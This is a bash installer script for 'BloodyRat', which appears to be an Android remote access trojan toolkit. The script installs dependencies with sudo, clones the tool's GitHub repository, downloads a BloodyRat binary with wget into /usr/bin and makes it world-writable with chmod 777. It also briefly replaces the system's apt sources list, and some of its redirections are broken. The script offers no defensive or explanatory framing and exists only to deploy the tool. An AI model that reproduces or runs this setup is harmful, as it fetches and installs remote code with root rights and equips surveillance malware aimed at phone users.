#! /bin/bash

#colors
white="\033[1;37m"                                          ##
grey="\033[0;37m"                                           ##
purple="\033[1;35m"                                         ##
red="\033[1;31m"                                            ##
green="\033[1;32m"                                          ##
yellow="\033[1;33m"                                         ##
purple="\033[0;35m"                                         ##
cyan="\033[0;36m"                                           ##
cyan1="\033[1;36m"                                          ##
cafe="\033[0;33m"                                           ##
fiuscha="\033[0;35m"                                        ##
blue="\033[1;34m"                                           ##
nc="\033[0m"                                                ## 


#spinner
spinner() {
        pid=$!
        spin='\|/-'
        i=0
        tput civis
        while kill -0 $pid 2>/dev/null
	do
                i=$(( (i+1) %4 ))
                printf "\r${cyan1}[${spin:$i:1}]${nc} ${cyan1} $launch"
                sleep .1
	done
        printf "\r   ${green}[✔]${nc} ${green} $splashdown";echo
        tput cnorm
}


function os () {
	cat /etc/os-release > /dev/null 2>&1
	if [ "$?" -eq "0" ]; then
		GET_DEB=`cat /etc/issue | awk '{print $1}'`
		if [ "${GET_DEB}" != "Kali" ];then
			OS=DEBIAN
		fi
		usr_name=`logname`
		BIN="/usr/bin"
		main="/home/${usr_name}/.BloodyRat"			
	else
		OS=NOT_SUPPORTED
	fi
}


function dependencies() {	
	if [[ `command -v git` && `command -v wget` && `command -v nodejs` && `command -v npm` && `command -v apktool` ]]; then		
		dependencies=true
	else
		pkgs=(git wget nodejs npm apktool)
		for pkg in "${pkgs[@]}"; do			
			type -p "$pkg" &>/dev/null || {
			sudo su -c "apt install "$pkg"  > /dev/null 2&>1" 
			}
	done
	fi	
}

function git_clone() {
	[ -d "${main}" ] && rm -rf ${main} > /dev/null 2>&1
	(git clone https://github.com/Bhaviktutorials/BloodyRat --quiet ${main})
}

function do_patches () {
	if [ "${OS}" != "DEBIAN" ];then
		sudo su -c "cat /etc/apt/sources.list > /etc/apt/SL.bk"
		sudo su -c "echo 'deb http://security.debian.org/debian-security stretch/updates main' > /etc/apt/sources.list"
		sudo su -c  "apt update -y && sudo apt install openjdk-8-jdk /dev/null 2&>1"
		sudo su -c "cat /etc/apt/SL.bk > /etc/apt/sources.list"
	else
		sudo su -c "apt install openjdk-8-jre-headless -y"
	fi
	sudo su -c "update-alternatives --set java /usr/lib/jvm/java-8-openjdk*/jre/bin/java > /dev/null 2&>1"
	sudo su -c "apt update -y /dev/null 2&>1" > /dev/null 2>&1
}

function main () {	
	cd ${main}/server && npm install
 	sudo su -c "wget -N https://github.com/Bhaviktutorials/BloodyRat/raw/main/files/BloodyRat -q -O ${BIN}/BloodyRat" && sudo su -c "chmod 777 ${BIN}/BloodyRat"
	BloodyRat --fix-apkbuilder 
}


os 
dependencies
git_clone 
do_patches
main
